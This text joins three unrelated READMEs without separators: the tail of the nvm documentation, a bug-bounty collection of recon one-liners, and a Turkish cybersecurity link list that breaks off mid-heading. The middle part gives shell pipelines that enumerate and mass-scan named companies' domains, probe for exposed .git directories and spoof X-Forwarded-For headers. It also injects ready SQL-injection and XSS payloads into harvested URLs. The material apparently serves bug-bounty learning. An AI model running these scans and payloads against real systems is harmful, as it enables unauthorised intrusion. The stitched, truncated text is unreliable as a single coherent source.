"$NVM_DIR/nvm.sh" ``` Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login: (you may have to add to more than one of the above files) ```sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm ``` ### Manual upgrade For manual upgrade with `git` (requires git v1.7+): 1. change to the `$NVM_DIR` 1. pull down the latest changes 1. check out the latest version 1. activate the new version ```sh ( cd "$NVM_DIR" git fetch origin git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin` ) && . "$NVM_DIR/nvm.sh" ``` ## Usage To download, compile, and install the latest release of node, do this: ```sh nvm install node ``` And then in any new shell just use the installed version: ```sh nvm use node ``` Or you can just run it: ```sh nvm run node --version ``` Or, you can run any arbitrary command in a subshell with the desired version of node: ```sh nvm exec 4.2 node --version ``` You can also get the path to the executable to where it was installed: ```sh nvm which 5.0 ``` In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc: - `node`: this installs the latest version of [`node`](https://nodejs.org/en/) - `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/) - `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`. - `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in semver, versions communicate breakage, not stability). ### Long-term support Node has a [schedule](https://github.com/nodejs/LTS#lts_schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments: - `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon` - `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon` - `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon` - `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon` - `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon` - `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon` - `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon` Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported. ### Migrating global packages while installing If you want to install a new version of Node.js and migrate npm packages from a previous version: ```sh nvm install node --reinstall-packages-from=node ``` This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one. You can also install and migrate npm packages from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` ### Default global packages from file while installing If you have a list of default packages you want installed every time you install a new version we support that too. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf [email protected] stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js. ### System version of node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing version number in the project root directory (or any parent directory). `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will all respect an `.nvmrc` file when a version is not supplied. For example, to make nvm default to the latest 5.9 release for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version ``` Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local node_version="$(nvm version)" local nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$node_version" ]; then nvm use fi elif [ "$node_version" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` ## License nvm is released under the MIT license. Copyright (C) 2010-2017 Tim Caswell and Jordan Harband Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ## Running tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Bash completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && . $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > $ nvm <kbd>Tab</kbd> ``` alias deactivate install ls run unload clear-cache exec list ls-remote unalias use current help list-remote reinstall-packages uninstall version ``` nvm alias: > $ nvm alias <kbd>Tab</kbd> ``` default ``` > $ nvm alias my_alias <kbd>Tab</kbd> ``` v0.6.21 v0.8.26 v0.10.28 ``` nvm use: > $ nvm use <kbd>Tab</kbd> ``` my_alias default v0.6.21 v0.8.26 v0.10.28 ``` nvm uninstall: > $ nvm uninstall <kbd>Tab</kbd> ``` my_alias default v0.6.21 v0.8.26 v0.10.28 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [busybox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. Busybox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell: ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.5/install.sh | bash ``` The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). ## Docker for development environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defiend development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 1.22 GB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -it nvm-dev -h nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 15 minutes to build the image and the image size would be about 1.2GB, so it's not sutable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to delete the node downloads from src (~/.nvm/src/) or you might get an error when trying to reinstall them again or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node PATH is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658)) ## Mac OS "troubleshooting" **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). [1]: https://github.com/creationix/nvm.git [2]: https://github.com/creationix/nvm/blob/v0.33.5/install.sh [3]: https://travis-ci.org/creationix/nvm [4]: https://github.com/creationix/nvm/releases/tag/v0.33.5 [Urchin]: https://github.com/scraperwiki/urchin [Fish]: http://fishshell.com
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters. ## Join Us (Limited to 800 members) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) [![GitHub followers](https://img.shields.io/github/followers/bminossi.svg?style=social&label=Follow&maxAge=2592000)](https://github.com/bminossi?tab=followers) [![GitHub followers](https://img.shields.io/github/followers/OfJAAH.svg?style=social&label=Follow&maxAge=2592000)](https://github.com/OfJAAH?tab=followers) ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) ### Search Asn Amass > @OFJAAAH > @zeroc00I - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me). ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### Using chaos search js > @OFJAAAH > @zeroc00I - [Explaining command](https://bit.ly/32vfRg7) Choas is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] - #\n#g" | anew | grep -Eo "(http|https)://att.com" ``` ### Search Subdomain using Gospider > @OFJAAAH > @zeroc00I - [Explaining command](https://bit.ly/2QtG9do) ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos > @OFJAAAH > @zeroc00I - [Explaining command](https://bit.ly/2D4vW3W) ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains > @OFJAAAH > @zeroc00I - [Explaining command](https://bit.ly/32pPRDa) ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew' ``` ### PSQL - search subdomain using cert.sh > @OFJAAAH > @zeroc00I - [Explaining command](https://bit.ly/32rMA6e) ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew' ``` ### Search subdomains using github and httpx > @OFJAAAH > @zeroc00I - [Github-search](https://github.com/gwen001/github-search) - Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only http://tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate > @OFJAAAH > @zeroc00I - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3jslKle) ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/3hL263x) ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2YXiK8N) ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf > @OFJAAAH > @zeroc00I - [Explained comand](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/zeroc00I) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/willxenoo) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
<a href="https://discordapp.com/users/850031066626129931" target="_blank"> <img src="https://img.shields.io/badge/Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white"> </a> <h1 align="center">Kaynaklar</h1> - [[MDISEC] siber güvenlikte nasıl gelişebilirim, nerden baslamaliyim?](https://www.mehmetince.net/siber-guvenlik-alaninda-kendimi-nasil-gelistirebilirim-nereden-baslamaliyim/) * ### Network - https://www.professormesser.com/network-plus/n10-008/n10-008-video/n10-008-training-course/ - https://berqnet.com/uploads/herkesicin_siberguvenlik.pdf - https://www.youtube.com/playlist?list=PL966g7O8Fr34Z-PsTCM1YBzB6COiu0uZp - https://www.ceyrekmuhendis.com/internet-nedir-nasil-calisir/ - https://www.youtube.com/watch?v=b573S89IhhA&list=PL1XUdfGZZ4rQ0UPDx__7W4LmeLab227vb - https://www.youtube.com/watch?v=L4alPp-Tx2M - https://www.youtube.com/watch?v=pDn2u65rQbQ - https://www.youtube.com/watch?v=_njkTOzKKUY&list=PLlEN794VQ4ir8739Bw-yFEKhz0JTc0O9U - https://esenbaharturkay.medium.com/devre-anahtarlama-ve-paket-anahtarlama-fda60601590b - https://www.youtube.com/playlist?list=PLm-hnICeZgkmDfAkckS7PPURoNUG8ClfX - https://www.udemy.com/course/ag-guvenligi-ccna-security-egitimi/?couponCode=9328E249055548AF6A70 - https://www.udemy.com/course/cicso-ccna-200-125-egitimi/?couponCode=37AC5A69F4EC7A3A2523 - https://www.mshowto.org/tor-the-onion-router-networku-nedir-nasil-calisir-neden-kullanilir.html - https://tr.wikipedia.org/wiki/Baz_istasyonu - https://www.ceyrekmuhendis.com/i2c-haberlesme-protokolu/ - https://www.youtube.com/watch?v=42u_2e6eNF4 - https://docplayer.biz.tr/431309-Turkce-ccna-egitim-notlari.html - https://www.youtube.com/watch?v=e4vJCXInaqQ - https://www.youtube.com/watch?v=gGTUHFX_ylQ - https://www.youtube.com/watch?v=JAMVcqZKL3E - https://www.youtube.com/playlist?list=PLXaBFPQgxYavJseF_HAXOeNH13OuHjI7s - https://www.mehmetince.net/pci-dss-ile-payment-gatewayler-arasindaki-http-security-headers-tartismalari/ - https://www.youtube.com/watch?v=qiQR5rTSshw - https://okankurtulus.com.tr/2020/08/07/dns-nedir-dns-sunucularina-yapilan-saldirilar-nelerdir/ - https://halilozel1903.medium.com/subnetting-nedir-cb8ca8a1cf5c - https://dl.packetstormsecurity.net/papers/general/temel-network.pdf - https://bidb.itu.edu.tr/seyir-defteri/blog/2013/09/07/osi-katmanlar%C4%B1 - https://www.youtube.com/watch?v=y54zRqJJ2wY&list=PLDUOF2Be-kznYJCjR4uVEBZawim1BG8o9 - http://meslek.eba.gov.tr/upload/dk10/Ag_Sistemleri_ve_Anahtarlama_10_3.pdf - https://www.youtube.com/watch?v=2VLfZSlD99U&list=PLlEN794VQ4irACjH2REk4quKBCbvpNH4b - https://www.youtube.com/watch?v=SyD2hvkdgoM - https://www.youtube.com/watch?v=haBM0e-5UL0 - [TCP dokumantasyonu(tr)](http://www.belgeler.org/rfc/rfc793.html) - [TCP dokumantasyonu ing](https://tools.ietf.org/html/rfc793) - https://tools.ietf.org/html/ - https://www.lammle.com/ - https://www.youtube.com/watch?v=6xwomn-k2TA&list=PLm-hnICeZgkmDfAkckS7PPURoNUG8ClfX * ### Linux - https://github.com/taylanbildik/Linux_Dersleri/ - https://egitim.acikkaynakfikirler.com/linux101-landing/ - https://linux-dersleri.github.io - https://www.youtube.com/watch?v=cEhnQN1ZmDI&ab_channel=SametAkbal - https://cmdchallenge.com/ - https://linuxjourney.com/ - https://overthewire.org/wargames/bandit/ - https://www.youtube.com/playlist?list=PLLKT__MCUeiwfK18Io6kvwrrhqQyQnV5W - https://www.edx.org/course/introduction-to-linux?index=product&queryID=774b903ad29ee024fea69bbd4f3ea99c&position=1 - https://github.com/LuNiZz/siber-guvenlik-sss/blob/master/Belgeler/Dokumanlar/Linux_ve_Pentesting_Baslangic.md#top - https://www.youtube.com/watch?v=_Kc9ImFpqro&list=PLh9ECzBB8tJOnxXrUTOqXfurKOZkN4mEY&ab_channel=BilgisayarKavramlari - https://docplayer.biz.tr/1661397-Kim-korkar-linux-tan.html - http://sedasaglik.com.tr/yazi/cronjobs- - https://www.yusufsezer.com.tr/linux-dersleri/ - https://www.slideshare.net/AhmetGrel1/temel-linux-kullanm-ve-komutlar - https://mega.nz/file/zAZhGAbB#vcPOkKpFWE5cAnznrJkLv63l_awGAJqoj79dM_OCmIE - https://www.youtube.com/watch?v=_Kc9ImFpqro&list=PLh9ECzBB8tJOnxXrUTOqXfurKOZkN4mEY - https://docplayer.biz.tr/1661397-Kim-korkar-linux-tan.html - https://www.slideshare.net/AhmetGrel1/temel-linux-kullanm-ve-komutlar - https://egitim.acikkaynakfikirler.com/linux101-landing/ - https://www.youtube.com/watch?v=cEhnQN1ZmDI&ab_channel=SametAkbal - https://www.slideshare.net/AhmetGrel1/temel-linux-kullanm-ve-komutlar - https://www.youtube.com/watch?v=_Kc9ImFpqro&list=PLh9ECzBB8tJOnxXrUTOqXfurKOZkN4mEY - https://www.youtube.com/playlist?list=PLeKWVPCoT9e1tqsgPTQabtumX6E1XpAhz - https://www.youtube.com/playlist?list=PLXaBFPQgxYavmJUblO66HkKvuV2lsnZZW - https://www.youtube.com/playlist?list=PLPa55dyKM2F1f8XQDSy4GQg2y7ZMIap1i - https://www.youtube.com/playlist?list=PL1RexjmoB3pgNmoSpXc7430AZRiWqT9Gx - https://sourceforge.net/projects/linuxcommand/files/AWTLCL/21.10/AWTLCL-21.10.pdf/download - http://web.deu.edu.tr/doc/misc/Linux_Sistem_Yonetimi.pdf - https://gaissecurity.com/bilgi/linux-restricted-shell-atlatma-teknikleri/ - https://www.slideshare.net/AhmetGrel1/temel-linux-kullanm-ve-komutlar - https://e-bergi.com/y/root-files/ - https://www.youtube.com/watch?v=r2q_XRKrqHQ&list=PLh9ECzBB8tJO9eiwfQbcA2ThMbUSkbOWf - https://www.youtube.com/watch?v=_Kc9ImFpqro&list=PLh9ECzBB8tJOnxXrUTOqXfurKOZkN4mEY - https://www.reddit.com/r/linux/comments/b8tj21/systemd_vs_openrc_what_is_it_all_about/ - https://docplayer.biz.tr/1661397-Kim-korkar-linux-tan.html - https://youtube.com/playlist?list=PLGWmuqrfJZRscAXSYLLQEfBCa2TidEUid - https://demirten.gitbooks.io/linux-sistem-programlama/content/capabilities/ * ### PrivEsc - 